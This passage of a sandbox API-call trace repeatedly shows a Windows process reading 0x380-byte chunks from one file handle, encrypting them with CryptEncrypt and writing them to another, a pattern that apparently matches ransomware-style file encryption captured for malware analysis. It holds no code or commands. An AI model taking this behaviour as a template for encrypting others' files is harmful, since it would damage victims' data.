pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.419] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.419] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.419] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.419] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.419] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.419] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.419] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.419] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.419] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.419] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.420] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.420] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.420] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.420] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.420] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.420] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.420] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.420] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.420] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.420] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.420] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.420] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.420] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.420] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.421] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.421] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.421] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.421] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.421] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.421] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.421] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.421] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.421] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.421] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.421] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.422] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.422] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.422] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.422] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.422] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.422] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.422] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.423] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.423] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.423] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.423] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.423] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.423] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.423] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.423] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.423] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.423] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.423] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.423] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.423] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.424] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.424] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.424] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.424] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.424] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.424] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.424] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.424] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.424] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.424] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.424] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.424] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.424] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.425] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.425] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.425] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.425] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.425] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.425] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.425] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.425] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.425] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.425] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.425] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.425] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.425] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.425] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.426] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.426] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.426] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.426] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.426] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.426] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.426] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.426] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.426] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.426] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.426] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.426] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.426] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.427] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.427] WriteFile (in: hFile=0x5d80, 